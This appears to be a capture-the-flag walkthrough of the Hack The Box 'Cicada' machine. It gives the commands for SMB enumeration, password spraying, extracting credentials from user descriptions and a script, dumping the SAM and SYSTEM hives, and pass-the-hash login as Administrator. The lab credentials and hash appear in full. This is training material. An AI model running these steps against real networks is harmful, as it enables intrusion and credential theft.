Cicada HTB Walkthrough Link to heading
Step 1: Initial Enumeration with Nmap Link to heading
The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.
sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35
Nmap Results Link to heading
The scan revealed several open ports, including:
- LDAP (389, 636, 3268, 3269)
- SMB (445)
- Kerberos (88)
- MSRPC (135, 593)
- DNS (53)
This indicates an Active Directory (AD) environment, which suggests possible attacks related to SMB, Kerberos, and LDAP.
Step 2: Enumerating SMB Shares Link to heading
Next, we check for accessible SMB shares:
smbclient -N -L //10.10.11.35
Discovered Shares:
ADMIN$
C$
- DEV
- HR
NETLOGON
SYSVOL
Step 3: Downloading HR Notices Link to heading
Attempting to access the HR
share without authentication:
smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"
Inspecting the file:
cat Notice\ from\ HR.txt
This provides a default password:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Step 4: Enumerate Users with SMB Link to heading
Using NXC to enumerate all user RIDs:
nxc smb 10.10.11.35 -u '.' -p "" --rid-brute
Step 5: Password Spraying with CME Link to heading
Using CrackMapExec (CME) to spray the default password across users:
cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Success: Link to heading
We discover the user michael.wrightson with valid credentials.
Step 6: Extracting User Descriptions Link to heading
Using CrackMapExec to check user descriptions:
crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
This reveals another user’s password:
cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3
Step 7: Accessing the DEV Share Link to heading
Using David’s credentials to explore the DEV
share:
smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1
Step 8: Gaining a PowerShell Shell Link to heading
The backup script reveals another password for Emily. Using Evil-WinRM to get a shell:
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
Inside the shell, navigate to the desktop and retrieve user.txt
:
cd C:\Users\emily.oscars\Desktop
cat user.txt
Step 9: Extracting SYSTEM & SAM Files Link to heading
To escalate privileges, dump the SAM & SYSTEM registry files:
reg save hklm\sam sam
reg save hklm\system system
Step 10: Dumping Admin Hash Link to heading
Using impacket-secretsdump
to retrieve NTLM hashes:
impacket-secretsdump -sam sam -system system local
The dump reveals the Administrator NTLM hash.
Step 11: Logging in as Administrator Link to heading
Using Evil-WinRM with the extracted hash:
evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
Once inside, retrieve root.txt
:
cd C:\Users\Administrator\Desktop
cat root.txt
Conclusion Link to heading
By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong passwords, SMB hardening, and monitoring Active Directory environments for unauthorized access attempts.